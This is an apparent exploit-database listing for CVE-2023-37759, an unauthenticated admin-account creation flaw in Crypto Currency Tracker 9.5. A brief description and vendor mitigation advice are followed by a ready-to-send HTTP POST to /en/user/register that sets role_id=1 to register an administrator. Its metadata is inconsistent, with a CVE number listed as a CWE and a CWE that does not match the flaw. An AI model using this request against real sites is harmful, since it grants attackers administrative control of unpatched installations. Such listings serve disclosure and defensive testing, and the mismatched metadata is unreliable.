Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

vendor:

Crypto Currency Tracker

by:

0xBr

9.8

CVSS

CRITICAL

Admin Account Creation

798

CWE

Product Name: Crypto Currency Tracker

Affected Version From: <=9.5

Affected Version To: 9.5

Patch Exists: NO

Related CWE: CVE-2023-37759

CPE: a:crypto_currency_tracker:crypto_currency_tracker:9.5

Metasploit:

Other Scripts:

Platforms Tested:

2023

Crypto Currency Tracker (CCT) 9.5 – Admin Account Creation (Unauthenticated)

This exploit allows an unauthenticated user to create an admin account in Crypto Currency Tracker (CCT) version 9.5 or earlier. By sending a specially crafted POST request to the /en/user/register endpoint, the attacker can bypass authentication and create an admin account.

Mitigation:

The vendor should release a patch that fixes the authentication bypass vulnerability. In the meantime, users can mitigate the risk by restricting access to the /en/user/register endpoint or implementing additional authentication measures.

Source

Exploit-DB raw data:

# Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
# Date: 11.08.2023
# Exploit Author: 0xBr
# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
# Version: <=9.5
# CVE: CVE-2023-37759

POST /en/user/register HTTP/2
Host: localhost
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 756

_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register